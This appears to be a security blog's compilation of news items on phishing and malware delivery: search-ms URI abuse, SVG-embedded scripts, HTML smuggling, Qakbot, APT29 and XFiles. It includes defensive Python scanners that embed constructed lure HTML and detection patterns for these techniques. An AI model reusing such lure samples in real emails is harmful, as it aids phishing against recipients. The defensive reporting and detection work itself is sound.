
New Malware Campaign Exploits Windows Search to Spread

 



A new and intricate malware campaign has been discovered by Trustwave SpiderLabs, leveraging the Windows search feature embedded in HTML code to spread malicious software. The attack begins with a phishing email containing an HTML attachment disguised as a routine document, such as an invoice. To deceive users and evade email security scanners, the HTML file is compressed within a ZIP archive. This extra layer of obfuscation reduces the file size for quicker transmission, avoids detection by some email scanners, and adds a step for users, potentially bypassing simpler security measures. Notably, this campaign has been observed in limited instances.


HTML Attachment Mechanics

Once the HTML attachment is opened, it triggers a complex attack by abusing standard web protocols to exploit Windows system functionalities. A critical component of the HTML code is the `<meta http-equiv="refresh"` tag, which automatically reloads the page and redirects to a new URL with zero delay, making the redirection instant and unnoticed by the user. Additionally, an anchor tag serves as a fallback mechanism, ensuring the user is still at risk even if the automatic redirect fails.


Exploitation of the Search Protocol

When the HTML file loads, browsers typically prompt users to allow the search action as a security measure. The redirection URL uses the `search:` protocol, allowing applications to interact directly with Windows Explorer's search function. The attackers exploit this protocol to open Windows Explorer and perform a search with parameters they crafted. These parameters direct the search to look for items labelled as "INVOICE," control the search scope to a specific directory, rename the search display to "Downloads" to appear legitimate, and hide their malicious operations using Cloudflare’s tunnelling service.


Execution of Malicious Files

After the user permits the search action, Windows Explorer retrieves files named "invoice" from a remote server. Only one item, a shortcut (LNK) file, appears in the search results. This LNK file points to a batch script (BAT) hosted on the same server. If the user clicks the file, it could trigger additional malicious operations. At the time of analysis, the payload (BAT) could not be retrieved as the server was down, but the attack demonstrates a sophisticated understanding of exploiting system vulnerabilities and user behaviour.

To prevent exploitation of the `search-ms` and `search` URI protocols, one mitigation strategy is to disable these handlers by deleting the associated registry entries. This can be achieved using specific commands.
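The attachment mechanics described above (a zero-delay `<meta http-equiv="refresh">` redirect to a `search:`/`search-ms:` URI, with an anchor tag as fallback) can be flagged at the mail gateway before a user ever sees the prompt. The following scanner is an added example written for this page, not code from Trustwave SpiderLabs or from the campaign; the sample attachment it scans is constructed here, and the host in its `crumb=location:` parameter is a placeholder.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample resembling the attachment described above.
# "example.invalid" is a placeholder host, not a real indicator.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<meta http-equiv="refresh" content="0; url=search-ms:query=INVOICE&amp;crumb=location:%5C%5Cexample.invalid%5Cshare&amp;displayname=Downloads">
</head><body>
<p>Your invoice is ready.</p>
<a href="search-ms:query=INVOICE&amp;crumb=location:%5C%5Cexample.invalid%5Cshare&amp;displayname=Downloads">Open invoice</a>
</body></html>"""

META_REFRESH_RE = re.compile(r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*>', re.I)
CONTENT_RE = re.compile(r'content\s*=\s*["\']([^"\']*)["\']', re.I)
HREF_RE = re.compile(r'<a\s[^>]*href\s*=\s*["\']([^"\']+)["\']', re.I)
SEARCH_SCHEME_RE = re.compile(r'^\s*search(?:-ms)?:', re.I)


def parse_search_uri(uri):
    """Split a search:/search-ms: URI into (scheme, {param: value})."""
    scheme, _, rest = uri.partition(":")
    params = {}
    for part in rest.split("&"):
        key, _, value = part.partition("=")
        if key:
            params[key.strip().lower()] = unquote(value)
    return scheme.strip().lower(), params


def scan_html_attachment(text):
    """Return one finding per redirect or link that targets the Windows search handler."""
    findings = []
    # Vector 1: automatic meta refresh. content="<delay>; url=<target>"
    for meta in META_REFRESH_RE.findall(text):
        m = CONTENT_RE.search(meta)
        if not m:
            continue
        content = html.unescape(m.group(1))
        delay, _, url_part = content.partition(";")
        url = url_part.strip()
        if url.lower().startswith("url="):
            url = url[4:].strip()
        if SEARCH_SCHEME_RE.match(url):
            scheme, params = parse_search_uri(url)
            findings.append({"vector": "meta-refresh", "delay": delay.strip(),
                             "scheme": scheme, "params": params})
    # Vector 2: the fallback anchor the user is expected to click.
    for href in HREF_RE.findall(text):
        href = html.unescape(href)
        if SEARCH_SCHEME_RE.match(href):
            scheme, params = parse_search_uri(href)
            findings.append({"vector": "anchor", "scheme": scheme, "params": params})
    return findings


def describe(findings):
    """Human-readable reasons for an analyst or a gateway log line."""
    reasons = []
    for f in findings:
        p = f["params"]
        r = f"{f['vector']} -> {f['scheme']}: query={p.get('query', '')!r}"
        if "location:" in p.get("crumb", "").lower():
            r += " with remote search scope"
        if p.get("displayname"):
            r += f", shown to the user as '{p['displayname']}'"
        reasons.append(r)
    return reasons


def is_suspicious(text):
    return bool(scan_html_attachment(text))


if __name__ == "__main__":
    for line in describe(scan_html_attachment(SAMPLE_HTML)):
        print(line)
```

A gateway rule built on this would quarantine any HTML (or ZIP-wrapped HTML) attachment for which `is_suspicious` is true; the `crumb=location:` and `displayname` parameters are worth logging because they show where the search is pointed and what label the victim would have seen.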

This attack surfaces the importance of user awareness and proactive security strategies. While it does not involve automated malware installation, it requires users to engage with various prompts and clicks, cleverly obscuring the attackers' true intent. As the threat landscape becomes more complex, continuous education and robust security measures are vital to protect against such deceptive tactics.

Trustwave SpiderLabs has updated its MailMarshal software to detect and block HTML files that abuse the search URI handler, offering additional protection for users.


Mobile Privacy Milestone: Gmail Introduces Client-Side Encryption for Android and iOS

 


Encryption is one of the most important mechanisms for protecting data exchanged between individuals, especially when the information exchange occurs over e-mail and is quite sensitive. As a result, it can be complicated for users to be able to achieve this when they use public resources such as the internet. 

Now that Gmail has added client-side encryption to its mobile platform, users may feel safer when sending emails with Gmail on their mobile devices. Earlier this year, Google announced that it would be supporting Android and iOS mobile devices with client-side encryption in Gmail too. 

Using Google's client-side encryption (CSE) feature, which gives users more control over encryption keys and data access, Gmail can now be used on Android and iOS devices, as well as web browsers. In the past few months, Gmail's web version has been upgraded to support client-side encryption. This app lets users read and write encrypted emails directly from their smartphones and tablets. 

In addition to the Education Plus and Enterprise Plus editions of Google Workspace, the Education Standard edition also offers the feature. Other Workspace editions, such as Essentials, Business Starter, Business Standard Plus, and Business Pro Plus, do not support client-side encryption. 

Furthermore, users who have personal Google accounts are not able to access it. For those using email via desktop through Gmail, client-side encryption will be available at the end of 2022 on a trial basis. Workspace users with a subscription to Enterprise Plus, Education Plus, or Education Standard were the only ones able to take advantage of this feature at that time. 

Client-side encryption also prevented certain features from working, including the multi-send mode, signatures, and Smart Compose. A more robust version of the feature has since been added to the Google Play Store. 

The company added the capability to allow users to see contacts even if they are unable to exchange encrypted emails so that they can keep in touch. There is also a security alert that appears in Google Mail when users receive attachments that are suspicious or that cannot be opened because of security concerns. 

While client-side encryption will now be available under the Enterprise Plus, Education Plus, and Education Standard Workspace accounts shortly, it has remained relatively exclusive. This type of Workspace account will also be the only kind of account that will be able to take advantage of the mobile rollout of client-side encryption. 

By using the S/MIME protocol, Google said that it will allow its users to encrypt and digitally sign their emails before sending them to Google servers so that they adhere to compliance and regulatory requirements. This feature lets users access and work with their most sensitive data from anywhere with their mobile devices. 

The blue lock icon in the subject field of Gmail for Android or iOS lets users enable client-side encryption while they are writing an email. Administrators will, however, have to enable access to the feature through their CSE administration interface, as it is disabled by default. 

During the past week, the search giant celebrated its 25th anniversary by letting teens (age 13 and above) try out its generative search service. The company also announced a new tool called Google-Extended that would enable website administrators to control how Google's Bard AI can be trained on their content. It allows website administrators to control whether or not Google can access their content. 

In addition to pulling the plug on Gmail's basic HTML version, which supported legacy browsers and users with slow connections, Google will also drop the automatic loading of Gmail's Basic view, instead loading the Standard view by default early next year. Customers who are using Google Workspace Enterprise Plus, Education Plus, and Education Standard will be able to take advantage of this feature. 

Emails With HTML Attachments are Still Popular Among Phishing Scammers

 


Cybercriminals are increasingly using malicious HTML files to attack computers, according to a recent study conducted by security researchers. Barracuda Networks' study also revealed that malicious files now account for over half of all HTML attachments sent via email, a significant increase compared with last year. 

Is there a phishing scam using HTML attachments you know of? Rather than placing links in the email body, attackers send HTML attachments that contact command-and-control (C&C) servers to download crypto-malware, Trojan horses, or other nasties. 

Phishing scams based on HTML emails have been around for a long time, but people aren't aware of them, and they are increasingly falling for the same. 

There is a high chance that you checked your email more than once this past weekend. This is despite it being a holiday weekend for many people.

The fact that HTML files continued to be one of the most common attachments used in phishing scams in 2022 shows that the method is still one of the most effective ways of getting past spam detection software and delivering malicious content to targets. 

HTML (HyperText Markup Language) is a markup language developed for documents intended to be displayed in a web browser, according to Wikibooks. Technologies such as Cascading Style Sheets (CSS) and programming languages such as JavaScript extend what such documents can do.

It is possible to render HTML documents as multimedia web pages using a web server or a local storage device that receives HTML documents from a web server. An HTML document describes the semantics of a web page and includes clues that indicate how it should appear to the end user. HTML can also describe the content of a web page. 

When victims are sent phishing emails using HTML files, they are frequently directed to malicious websites, downloaded files, or phishing forms that can be displayed locally within their browsers on their computers.

It is common for email security software to overlook these attachments when delivering messages to targets, since HTML itself does not appear to pose a threat to the recipients; as a result, messages are delivered successfully to their inboxes. 

Something is interesting about this recent increase in malicious HTML files. This does not seem to be the result of mass attack campaigns in which hackers send the same attachments to many victims. 

To protect against cyberattacks, it is now more imperative than ever to implement appropriate cybersecurity measures. The report offers examples of how such attacks can be prevented. 

It has been reported that the cybercriminal groups DEV-0238 and DEV-0253 have also been using HTML smuggling to deliver keyloggers through HTML attachments. HTML smuggling has also been associated with the cybercriminal group DEV-0193 delivering Trickbot malware. 

HTML attachments are used in phishing attacks 


HTML attachments that spam phishing sites are the most common type of HTML attachment. There is generally no malicious code within the HTML file itself; that is, it does not contain code that launches arbitrary code on the system, and it looks benign. Despite this, it is recommended to treat such an attachment with caution. By mimicking the look of a sign-in page for a service such as Microsoft, Google, or a major online bank, the scam could lead the user to enter their credentials into the form and submit it, at which point a malicious website takes over their account. 

When it comes to spam forms and redirection strategies in HTML attachments, hackers usually use several tactics for implementation. These tactics range from simple redirections to obfuscating JavaScript to disguise phishing forms to steal personal information. 

A secure email gateway and antivirus solution can check email messages for attachments to see if they contain malicious URLs, scripts, or other threats that could endanger users' security. 

The majority of cybercrime attacks are composed of malicious phishing forms or redirects created using JavaScript in HTML attachments. This is done to avoid detection. 

Considering that malicious files can damage your device and your organization, it has become increasingly important to ensure you take the necessary precautions to keep yourself safe from them. It is imperative to know how to prevent such attempts by taking the following precautions: 

The infrastructure of your email system will be crucial in this case. Antivirus software and firewalls should be updated regularly to function properly. Furthermore, a solid plan of action must be implemented for data loss prevention. DMARC protocols should be defined for your domain as the most effective way to ensure communications security. 

Two-factor authentication is necessary, followed by zero-trust access based on multi-factor authentication. With these in place, your employees will be protected even if they fall victim to hacker attacks, credential theft, and phishing, because the access system evaluates their credentials, device, location, time zone, and history of access, and limits breaches. 

The importance of employee training on recognizing and reporting malicious HTML attachments should be recognised. Employees must be trained on how to recognize and report attachments from unknown sources, especially those containing malware. Cybersecurity threats can have serious consequences for a business organization if they are not prevented.

Certainly, obfuscation is one of the common denominators among all the spammed HTML attachments in this case. Having to deal with a threat like this at the email gateway layer demonstrates just how difficult it is to detect.

Qakbot Distributes Malware Through OneNote

 


There have been reports of a new wave of Qakbot campaigns that use a novel method of distributing malware as part of the delivery process. This sophisticated malware is known as Qakbot, though it goes by several other names, such as Pinkslipbot and QuakBot. 

Research has found that Qakbot campaigns have been operating since 2007, and they are now using OneNote documents to reach victims. Infected systems tend to host malicious software that targets sensitive data on those systems, such as login credentials, financial data, and personal information. 

It has been observed that Qakbot has been used in recent years to distribute ransomware via other botnets, such as Emotet, which drops a secondary payload onto their botnets. 

In-Depth Discussion of the Subject

  • As part of these campaigns, malware is delivered using two attack vectors; one attacker embeds the URL into the email to download the malicious file, and the other uses the malicious file as an attachment in an email. 
  • Documents in OneNote feature a call-to-action button that runs the payload associated with the document when clicked.  
  • Qakbot uses various evasion methods, such as anti-debugging techniques, anti-dynamic analysis techniques, anti-AV techniques, and encrypted communication between clients and servers. 
What Are The Key Players?

  • Banks, financial institutions, wealth management companies, and even public sector organizations are the most impacted, followed by organizations in the government and outsourcing sectors.
  • Organizations in the United States, Thailand, India, and Turkey were targeted with the campaigns. 
A OneNote-Qakbot Campaign is Not New

According to researchers at Sophos, two parallel spam campaigns, nicknamed Qaknote, were disseminating malicious OneNote attachments by embedding a malicious HTML application within the attachment.

  • This campaign started with the dissemination of impersonal malspam that contained a link to the malicious OneNote document embedded in the email. 
  • In the second case, a malicious OneNote notebook was sent to all recipients of existing email threads via a reply-to-all message, using thread injection to hijack those threads.
  • Once Qbot has been downloaded and installed through these attachments, it is ready to use. 
Here are the Main Points

Recent Qakbot campaigns have been focused on specifically targeted sectors, in contrast to earlier campaigns that appeared indiscriminate, and researchers predict that this targeted approach will likely persist in future campaigns as well. 

TTPs have been shared between researchers to help detect and mitigate this threat. Emails with attachments with unusual extensions are blocked, malicious websites are avoided, and top-level domains that are rarely used are blocked.   

Phishing Scam Blank Image Masks Code in SVG Files

 

Researchers from Avanan have seen the worldwide spread of a new threat known as 'Blank Image,' where hackers attach blank images to HTML messages. The user is instantly sent to a malicious URL once they open the attachment.

Blank Image attack 

The bogus emails claim that you need to sign a DocuSign document. The attachment is cryptically called "Scanned Remittance Advice.htm". The HTML file contains a Base64-encoded SVG picture; scammers use SVG vector pictures encoded inside HTML attachments to get around the security features that are often turned on automatically in email inboxes. 

SVGs are XML-based vector images that can contain HTML script elements, in contrast to raster images like JPG and PNG. When an HTML document uses an `<embed>` or `<iframe>` tag to display such an image, the SVG is rendered and the JavaScript embedded in it is executed.

Although the message's body seems fairly safe, opening the HTML attachment lets its malicious payload loose on your device. This file contains the attack's script rather than the XML information that a typical SVG would include.
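The two points above (an SVG can carry script elements, and a Base64-encoded SVG inside an HTML attachment is rendered, script included, through `<embed>` or `<iframe>`) suggest a straightforward gateway check: decode every inline SVG data URI and parse it as XML, looking for anything executable. The scanner below is an added example written for this page, not Avanan's code or the sample from the campaign; the attachments it inspects are constructed here, and the script element in the suspicious one is an empty placeholder.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed samples. The script body is a placeholder comment; only its presence matters.
_SVG_WITH_SCRIPT = """<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<rect width="1" height="1" fill="white"/>
<script type="text/javascript">/* constructed placeholder; no real payload */</script>
</svg>"""
_SVG_CLEAN = ('<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">'
              '<rect width="1" height="1" fill="white"/></svg>')


def _as_data_uri(svg_text):
    return "data:image/svg+xml;base64," + base64.b64encode(svg_text.encode()).decode()


# A "blank image" attachment embedding the scripted SVG, and a benign one for comparison.
SAMPLE_ATTACHMENT = ('<html><body><embed src="' + _as_data_uri(_SVG_WITH_SCRIPT)
                     + '" type="image/svg+xml"></body></html>')
CLEAN_ATTACHMENT = '<html><body><img src="' + _as_data_uri(_SVG_CLEAN) + '"></body></html>'

DATA_URI_RE = re.compile(r'data:image/svg\+xml;base64,([A-Za-z0-9+/=]+)', re.I)
EVENT_ATTR_RE = re.compile(r'^on[a-z]+$', re.I)


def _local(name):
    """Strip an XML namespace prefix such as {http://www.w3.org/2000/svg}."""
    return name.rsplit('}', 1)[-1].lower()


def inspect_svg(svg_bytes):
    """Return reasons the SVG should not be trusted; empty list means nothing found."""
    reasons = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError:
        # A typical SVG is well-formed XML; a decode that is not XML is itself a signal.
        return ["embedded data is not well-formed XML"]
    for el in root.iter():
        if _local(el.tag) == "script":
            reasons.append("script element")
        for attr in el.attrib:
            if EVENT_ATTR_RE.match(_local(attr)):
                reasons.append(f"event handler attribute {attr}")
    return reasons


def scan_for_embedded_svg(html_text):
    """Decode every inline Base64 SVG in the HTML and inspect it."""
    results = []
    for b64 in DATA_URI_RE.findall(html_text):
        try:
            svg = base64.b64decode(b64, validate=True)
        except ValueError:
            results.append({"decoded": False, "reasons": ["undecodable base64"]})
            continue
        results.append({"decoded": True, "reasons": inspect_svg(svg)})
    return results


def is_suspicious(html_text):
    return any(r["reasons"] for r in scan_for_embedded_svg(html_text))


if __name__ == "__main__":
    print("sample:", scan_for_embedded_svg(SAMPLE_ATTACHMENT))
    print("clean: ", scan_for_embedded_svg(CLEAN_ATTACHMENT))
```

Because the check decodes the image rather than matching the outer HTML, it is not defeated by the layering of obfuscation the researchers describe: whatever wraps the data URI, the SVG must be valid XML with a script element for the browser to execute it.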

As per researchers, this is a creative approach to masking the message's genuine intention. It avoids being scanned by conventional Click-Time Protection and VirusTotal; most security services are defenceless against these assaults because of the piling of obfuscation upon obfuscation.

Therefore, users should keep away from any emails that have HTML or .htm attachments. Administrators should consider blocking HTML attachments and treating them the same as executables (.exe, .cab).

This attack can be linked to a prior 'MetaMorph' assault initially discovered by Avanan a few years ago, wherein phishing actors employ meta refresh to drive users away from a locally hosted HTML attachment and onto a phishing website on the open internet. A meta refresh is a feature that tells a web browser to automatically reload the current web page after a specified amount of time.

HTML-containing emails and .HTM attachments should be handled carefully by users. Avanan also advises admins to think about blocking them.

Data Security can be Enhanced Via Web Scraping

Web information aids security professionals in understanding potential weaknesses in their own systems, threats that might come from outside organizations' networks, and prospective threats that might come via the World Wide Web. 

In reality, automated tests that can find the presence of potential malware, phishing links, various types of fraud, information breaches, and counterfeiting schemes are performed using this database of public Web data.

Web scraping: What is it?

Large volumes of data can be automatically gathered from websites via web scraping. The majority of this data is unstructured and is shown in HTML format; it is transformed into structured data in a spreadsheet or database so that it can be used in a variety of applications.

Approaches to web scraping include utilizing online services, certain APIs, or even writing one's own code from scratch. The company doing the scraping is aware of the sites to visit and the information to be collected. Many big websites, including Google, Twitter, Facebook, StackOverflow, etc., have APIs that let users access their data in a structured manner. 

How Do Web Scrapers Operate?

Web scrapers have the power to extract all the data from specified websites or the precise data that a user requires. If you wanted to find out what kinds of peelers were available, for instance, you might want to scrape an Amazon page, but you might only need information on the models of the various peelers, not the feedback from customers.

Therefore, the URLs are first provided when a web scraper intends to scrape a website. Then, all of the website's HTML code is loaded. A more sophisticated scraper might also extract all of the CSS and JavaScript parts. The scraper then extracts the necessary data from this HTML code and outputs it in the manner that the user has chosen. The data is typically stored as an Excel spreadsheet or a CSV file, but it is also possible to save it in other formats, such as JSON files.
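The pipeline just described (URL in, HTML loaded, the needed fields extracted, structured output such as CSV or JSON) is short enough to show end to end with only the Python standard library. The extractor below is an added example for this page, not a tool from any of the companies mentioned; it parses a constructed sign-in page (placeholder `example.invalid` domains), keeps the title, links, and form structure, and, in the spirit of the phishing-site monitoring described later on this page, flags forms with a password field whose action posts to a different host than the page itself. The `fetch` step is left to the caller so the example runs offline.

```python
import csv
import io
import json
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample page standing in for HTML a scraper would download.
SAMPLE_PAGE = """<html><head><title>Account sign-in</title></head>
<body>
<form action="https://collector.example.invalid/submit" method="post">
  <input name="username"><input name="password" type="password">
</form>
<a href="/help">Help</a>
<a href="https://cdn.example.invalid/logo.png">Logo</a>
</body></html>"""


class PageExtractor(HTMLParser):
    """Collects the title, absolute links, and forms (action, method, inputs) while parsing."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.title = ""
        self.links = []
        self.forms = []
        self._in_title = False
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "a" and a.get("href"):
            self.links.append(urljoin(self.base_url, a["href"]))
        elif tag == "form":
            self._form = {"action": urljoin(self.base_url, a.get("action") or ""),
                          "method": (a.get("method") or "get").lower(),
                          "inputs": []}
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append({"name": a.get("name") or "",
                                         "type": (a.get("type") or "text").lower()})

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data.strip()


def extract(html_text, base_url):
    """Turn one downloaded page into a structured record (step 3 of the pipeline)."""
    p = PageExtractor(base_url)
    p.feed(html_text)
    p.close()
    return {"url": base_url, "title": p.title, "links": p.links, "forms": p.forms}


def credential_forms_posting_offsite(record):
    """Actions of forms that collect a password but submit it to another host."""
    page_host = urlparse(record["url"]).hostname
    hits = []
    for f in record["forms"]:
        has_password = any(i["type"] == "password" for i in f["inputs"])
        if has_password and urlparse(f["action"]).hostname != page_host:
            hits.append(f["action"])
    return hits


def to_csv(records):
    """Step 4: one CSV row per page, ready for a spreadsheet."""
    buf = io.StringIO()
    w = csv.writer(buf)
    w.writerow(["url", "title", "link_count", "offsite_credential_forms"])
    for r in records:
        w.writerow([r["url"], r["title"], len(r["links"]),
                    ";".join(credential_forms_posting_offsite(r))])
    return buf.getvalue()


def to_json(records):
    return json.dumps(records, indent=2)


if __name__ == "__main__":
    rec = extract(SAMPLE_PAGE, "https://login.example.invalid/signin")
    print(to_csv([rec]))
```

In a real run, `extract` would be fed the body returned by an HTTP fetch of each URL; because `urljoin` resolves relative links against the page URL, the link list is usable as the frontier for the next crawl step.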

Cybersecurity Via Web Scraping

1. Monitoring for Potential Attacks on Institutions

Some of the top firms' security teams use open Web data collecting networks to acquire data on potential online threat actors and analyze malware. 

Additionally, they continuously and automatically check the public domain for potentially harmful websites or links using Web scraping techniques. For instance, security teams can instantly recognize several phishing websites that aim to steal important customer or business data like usernames, passwords, or credit card information.

2. Scraping the Web for Cybersecurity 

Web data collecting is used by a variety of cybersecurity companies to evaluate the risk that various domains pose for fraud and viruses. In order to properly assess the risk, cybersecurity firms can utilize this to contact potentially harmful websites as a 'victim' or a legitimate user to see how the website might target an unwary visitor. 

3. Analysis and Reduction of Threats

Public Web data collecting networks are used by threat intelligence companies to get information from a variety of sources, including blogs, public social media channels, and hackers, in order to find fresh information on a range of potential dangers. 

Their insights are based on this Web data collecting, which they subsequently disseminate to a wide range of customers that want to strengthen their own system security.

Despite being utilized often in business, lawful web scraping is still a touchy subject. Where personal information is scraped, this is the most evident. Users of LinkedIn, for instance, are aggressively marketing their personal information since the platform essentially functions as a professional CV showcase. Less desirable is having those details gathered in bulk, compiled, and sold to random people.

An organization's visibility and capacity to respond to online threats across the large online terrain in real-time are both improved by integrating with Web data collecting networks.

Threat Actors Prefer Archive Files for Deploying Malware Infections


Hackers prefer archive files, not MS Office

Archive files like .zip and .rar formats are now popular ways of distributing malware infections. HP Wolf Security report findings conclude that MS Office documents were not the most popular file format used in malware attacks. The company's third-quarter report reveals that archive files showed a 42% attack share, whereas Office recorded a 40% share. 

The report also noticed a sharp rise in popularity for archives, as the formats have seen their usage increase up to 22% since the first quarter of the year. As per the HP Wolf Security team, hackers prefer archive files because they are difficult to detect. 

"Archives are attractive to threat actors because they are easily encrypted, making them difficult for web proxies, sandboxes, and email scanners to detect malware. Moreover, many organizations use encrypted archives for legitimate reasons, making it challenging to reject encrypted archive email attachments by policy," the report said. 

Rise in HTML Smuggling Attacks

Besides the increase in archive files, HP Wolf Security logged a rise in "HTML smuggling" attacks, which, likewise, can escape security measures by using common file types. 

In this case, the user is sent a malicious PDF file containing loads of HTML. When opened, the PDF redirects the user to a fake downloader page for a common reader like Adobe Acrobat. After this, the page attempts to offer an archive file containing the actual malware payload. 

Threat actors prefer Qakbot malware strain

The researchers found that one group in particular, "Qakbot", favors the HTML smuggling technique to get its malware into the end user machines. The group, which went on a rampage during the summer, has restarted its activities. 

Qakbot is a highly effective malware strain that has been used by hackers to steal data and deploy ransomware. Most of these rising campaigns depend on HTML, aiming to compromise systems, moving away from malicious Office documents as the standard delivery method for the malware strain. 

Lastly, the team discovered that a traditional approach to ransomware is making a comeback. Magniber, a so-called "single-client ransomware" operation, profits not by attacking big organizations and demanding multi-million dollar ransoms, but instead seeks out individual PCs, locking up the data and asking users for a $2,500 payout.

The method goes back to the early times of ransomware when individual systems were attacked en masse with hopes of achieving a greater number of successful infections and ransom payments. 

Alex Holland, a senior malware analyst at HP said:

"Every threat actor has a different set of capabilities and resources that factor into what tactics, techniques, and procedures they use. Targeting individuals with single-client ransomware like Magniber requires less expertise, so this style of attack may appeal to threat actors with fewer resources and know-how who are willing to accept lower ransoms from victims"


Microsoft: Hackers Exploring New Attack Techniques

Malicious actors are adapting their tactics, techniques, and procedures (TTPs) in response to Microsoft's move to automatically block Excel 4.0 (XLM or XL4) and Visual Basic for Applications (VBA) macros across Office programs.

Malicious Microsoft Office document attachments sent in phishing emails often contain VBA and XL4 Macros, two short programs designed to automate repetitive processes in Microsoft Office applications that threat actors use to load, drop, or install malware.

Sherrod DeGrippo, vice president of threat research and detection at Proofpoint, stated "the threat landscape has changed significantly as a result of threat actors shifting away from directly disseminating macro-based email attachments."

The change was made as a result of Microsoft's announcement that it will stop the widespread exploitation of the Office subsystem by making it more challenging to activate macros and automatically banning them by default.

New tactics 

Use of ISO, RAR, and Windows Shortcut (LNK) attachments to get around the block has multiplied by 66%, according to security firm Proofpoint, which calls this activity 'one of the largest email threat landscape shifts in recent history.' Actors spreading the Emotet malware are also involved in this activity.

The use of container files like ISOs, ZIPs, and RARs has also increased rapidly, by about 175 percent. These are increasingly being used as initial access mechanisms by threat actors; between October 2021 and June 2022, the use of ISO files surged by over 150 percent.

Since October 2021, the number of campaigns including LNK files has climbed by 1,675%. Proofpoint has been tracking a variety of cybercriminal and advanced persistent threat (APT) actors who frequently use LNK files.

Emotet, IcedID, Qakbot, and Bumblebee are some of the famous malware families disseminated using these new techniques.

According to Proofpoint, the usage of HTML attachments employing the HTML smuggling approach to put a botnet on the host system has also increased significantly. Their distribution volumes, however, are still quite limited.

Finally, with a restricted range of potential threats to assess, email security systems are now more likely to detect hazardous files.

Google Drive & Dropbox Targeted by Russian Hackers

The Russian state-sponsored hacking collective known as APT29 has been attributed to a new phishing campaign that takes advantage of legitimate cloud services like Google Drive and Dropbox to deliver malicious payloads on compromised systems.

In recent efforts targeting Western diplomatic stations and foreign embassies globally between early May and June 2022, the threat group APT29, also known as Cozy Bear or Nobelium, has embraced this new strategy. The phishing documents included a link to a malicious HTML file that was used as a dropper for other harmful files, including a Cobalt Strike payload, to enter the target network.

Google and Dropbox were alerted about the operation by Palo Alto Networks, and they took measures to restrict it. Organizations and governments have been cautioned by Unit 42 researchers to maintain a high state of alert. Organizations should review their capacity to identify, inspect, and block undesirable traffic to legitimate cloud storage providers in light of APT29's new methods.

APT29, also known as Cozy Bear, Cloaked Ursa, or The Dukes, is a cyber espionage organization that seeks to gather information that supports Russia's geopolitical goals. It also carried out the SolarWinds supply-chain hack, which resulted in the compromising of several US federal agencies in 2020.

The use of cloud services like Dropbox and Google Drive to mask their activity and download further cyberespionage into target locations is what has changed in the most recent versions. According to reports, the attack's second version, seen in late May 2022, was further modified to host the HTML dropper in Dropbox.


The findings also line up with a recent statement from the Council of the European Union that "condemns this appalling behavior in cyberspace" and highlights the rise in hostile cyber actions carried out by Russian threat actors.

In a news release, the EU Council stated that "this increase in harmful cyber actions, in the context of the war against Ukraine, presents intolerable risks of spillover effects, misinterpretation, and possible escalation."

XFiles Malware Exploits Follina, Expands Its Attacks

What is XFiles?

The X-Files info stealer malware has added an exploit for a new vulnerability, CVE-2022-30190 (Follina), to attack targeted systems with malicious payloads. A cybersecurity firm said that the malware uses Follina to deploy the payload, run it, and take control of the targeted computer. "In the case of the XFiles malware, researchers at Cyberint noticed that recent campaigns delivering the malware use Follina to download the payload, execute it, and also create persistence on the target machine," says Bleeping Computers.  

How does the Follina infection work? 

• The malware, sent in the victims' spam mail, consists of an OLE object that directs to an HTML file on an external resource containing JavaScript code, which exploits Follina. 

• After the code is executed, it gets a base64-encoded string that contains PowerShell commands to establish a presence in the Windows startup directory and deploy the malware. 

• The second-stage module, "ChimLacUpdate.exe," consists of an AES decryption key and hard-coded encrypted shellcode. An API call decodes it and deploys it in the same running process. 

• After infection, XFiles starts normal info stealer activities: targeting passwords, history, and cookies stored in web browsers, taking screenshots, targeting cryptocurrency wallets, and looking for Telegram and Discord credentials. 

• The files are locally stored in new directories before they are exfiltrated via Telegram. 

The XFiles is becoming more active 

• A cybersecurity agency said that XFiles has expanded by taking on new members and starting new projects.

• One project XFiles launched earlier this year is called the 'Punisher Miner.'

• Ironically, the new mining tool is priced at $9, the same as a one-month rental of the XFiles info stealer.

CyWare Social says "it appears that the XFiles gang is expanding and becoming more prolific. The gang is recruiting talented malware authors, becoming stronger, and thus providing their users with more readymade tools that do not require experience or coding knowledge. Successful incorporation of the Follina-exploiting document increases the chances of infection and consequently increases the success rate of attacks."

Cybercriminals Impersonate Government Employees to Spread IRS Tax Frauds

 

Around the 2021 IRS income tax return deadline in the United States, cybercriminals were using advanced tactics in their phishing kits, which gave them a high delivery success rate for spoofed emails carrying malicious attachments.

On April 18, 2022, a notable campaign was detected that used phishing emails imitating the IRS and, in particular, one of the industry vendors that provide services, including email delivery, to government agencies. Cybercriminals choose seasons when taxpayers are busy with taxes and holiday preparations, which is why extra caution is warranted at these times.

The impersonated IT services vendor is widely used by key federal agencies, including the Department of Homeland Security, as well as various state and local government websites in the United States. The phishing email alerted victims to outstanding IRS payments, which were to be paid via PayPal, and included an HTML attachment that looked like an electronic invoice. Notably, the email contained no URLs and was delivered to the victim's mailbox without being tagged as spam. Based on the inspected headers, the email passed through many "hops," predominantly network hosts and domains registered in the United States.

It is worth mentioning that none of the involved hosts had previously been blacklisted, nor showed any sign of bad IP or anomalous domain reputation at the time of identification. The bogus IRS invoice's HTML attachment contains JavaScript-based obfuscation. Further investigation revealed embedded logic that detected the victim's IP address (using a GEO2IP module hosted on a third-party website), most likely to select targets or filter by region.

Once the user opens the HTML attachment, the phishing script prompts the user for credentials, impersonating the Office 365 authentication process with an interactive form.

Once the user enters credentials, the phishing kit validates them by checking access to the victim's email account over the IMAP protocol. Based on the de-obfuscated JS content, the actors were using the "supportmicrohere[.]com" domain.

